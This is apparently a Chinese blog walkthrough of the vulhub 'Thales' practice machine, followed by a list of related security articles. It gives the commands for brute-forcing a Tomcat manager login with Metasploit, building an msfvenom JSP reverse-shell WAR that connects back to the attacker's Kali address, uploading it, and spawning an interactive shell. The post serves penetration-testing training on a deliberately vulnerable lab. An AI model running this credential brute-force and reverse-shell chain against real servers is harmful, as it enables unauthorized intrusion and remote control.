vulhub-Thales靶机练习

1.安装靶机

可以看到没有IP地址,所以我们得通过kali扫出我们的IP地址

2.IP扫描

可以根据我们的MAC地址来判断除我们的靶机IP,同时我们可以看到开放了22和8080端口

3.端口访问

首先我们访问一下8080端口

点击host manager,给我们弹出一个登录界面

4.漏洞查找

这时我们可以利用msf来爆破一下,首先我们先启动一下msf

复制代码
msfconsole

然后我们查找一下tomcat可以利用的东西

复制代码
search tomcat login

接下来我们利用这个来进行爆破,这里已经给了我们怎么使用的语句

复制代码
use 0

输入我们要爆破的IP地址

复制代码
set rhosts 172.16.2.5
run

成功获得我们的账号密码

然后去登录一下,登录到我们的管理员系统

在应用程序列表的位置我们找到了上传文件的地方,这里我们可以上传一个反弹shell的文件

利用kali生成一个反弹shell的war文件

复制代码
msfvenom  -p java/jsp_shell_reverse_tcp LHOST=172.16.2.61 LPORT=8888 -f war -o shell.war //kali的地址以及端口

上传我们的shell文件并开启监听

可以看到反弹shell成功,可以升级一下变成可交互的页面

复制代码
python3 -c "import pty;pty.spawn('/bin/bash')"
相关推荐
xiejava10183 小时前
开源安全管理平台wazuh-暴力破解检测与响应
安全·开源·wuzuh
毕设源码-郭学长10 小时前
【开题答辩全过程】以 安全培训信息管理平台为例,包含答辩的问题和答案
安全
jieyu111912 小时前
网络、主机安全扫描工具
linux·安全·系统安全
FIN666813 小时前
昂瑞微冲刺科创板:创新驱动,引领射频芯片国产化新征程
前端·安全·前端框架·信息与通信·芯片
用户479492835691518 小时前
面试官:讲讲2FA 双因素认证原理
前端·后端·安全
Mintimate20 小时前
Vue项目接口防刷加固:接入腾讯云天御验证码实现人机验证、恶意请求拦截
前端·vue.js·安全
网安INF21 小时前
网络攻防技术:网络安全攻击概述
安全·web安全·网络安全·网络攻防
深盾安全1 天前
C++实战:快速提取Android APK数字签名
安全
white-persist1 天前
SQL 注入详解:从原理到实战
前端·网络·数据库·sql·安全·web安全·原型模式
AORO20251 天前
防爆手机与普通手机的区别!
网络·5g·安全·智能手机·电脑·信息与通信